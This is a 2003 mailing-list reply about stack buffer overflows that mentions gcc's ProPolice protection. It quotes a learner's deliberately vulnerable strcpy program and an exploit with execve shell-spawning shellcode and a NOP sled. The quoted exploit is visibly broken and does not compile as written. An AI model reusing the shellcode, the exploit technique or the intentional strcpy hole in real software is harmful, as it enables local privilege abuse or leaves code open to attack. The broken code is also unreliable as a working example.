[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Why doesnt work?



I wonder which version of gcc your using if gcc at all. I wonder this
because in new releases of gcc contain some patches to help protect from
buffer overflows, propolice. I found when expirementing with bufferflows
of a similar simpile c proggie needed the amount of data over the buffer
size to be approx 20-30 chars more than the size of the buffer.
Have you tried with a huge amount of data, like say double?
Cheers,
Daniel.

On 10/8/2003, "BORJA RUIZ CASTRO MORON" <padre@xxxxxxxxxxxx> wrote:

>Hi! Im trying 2 xploit a little code:
> -----------------------------------------------------------
>
>// foo.c, vuln proggy
>// compile gcc -o foo foo.c
>//
>
>#include <stdio.h>
>#include <string.h>
>
>main (int argc,char **argv){
>
>char buffer[1024];
>
>if (!argc) {
>    fprintf(stdout,"No argument found.");
>    exit(-1);
>    }
>
>strcpy(buffer,argv[1]);
>
>}
>
> -------------------------------------------------------------------------
>
>We see,if argv[1]>1024, It will generate a segmentation fault,it isnt?
>
>So,here the exploit code:
>
>// Exploit code 4 foo.c
>//
>
>#include <stdio.h>
>#include <unistd.h>
>#include <stdlib.h>
>#include <string.h>
>
>#define NOP 0x90
>
>main (void) {
>
>char buffer[1032]; /* 1024 + 8 */
>int offset,i,ret;
>char *ptr,*ptr2;
>
>
>char shellcode[]=
>"\x31\xc0"                      // xorl         %eax,%eax
>"\x50"                          // pushl        %eax
>"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
>"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
>"\x89\xe3"                      // movl         %esp,%ebx
>"\x99"                          // cltd
>"\x52"                          // pushl        %edx
>"\x53"                          // pushl        %ebx
>"\x89\xe1"                      // movl         %esp,%ecx
>"\xb0\x0b"                      // movb         $0xb,%al
>"\xcd\x80"                      // int          $0x80
>;
>
>long get_sp(){
> __asm__ ("movl %esp,%eax");
>     }
>
>help () {
>fprintf ("Usage: %s <offset>\n",argv[0]);
>exit(0);
>}
>
>if (!argc)
>     help();
>
>offset=atoi(argv[1]);
>
>for (i=0;i<strlen(buffer);i++) {
>   buffer[i]=0x00;
>     }
>
>ptr=buffer;
>
>for (i=0;i<(strlen(buffer)-strlen(shellcode));i++) {
>                       *(ptr++)=NOP;
>                                   }
>   for(i=0;i<strlen(shellcode);i++)
>       *(ptr++)=shellcode[i];
>              }
>   ptr2=(long *)ptr;
>
>   for(i=0;i<8;i++) {
>       *(ptr2++)=get_sp()+offset;
>                 }
>execl("./foo", "foo",buffer,0);
>}
>
>//EOF
>
> --------------------------------------------------------
>This exploit doesnt work,can you help me? why it doesnt work? ARggg!!!
>
>Sorry 4 my poor english.
>Greetings from spain!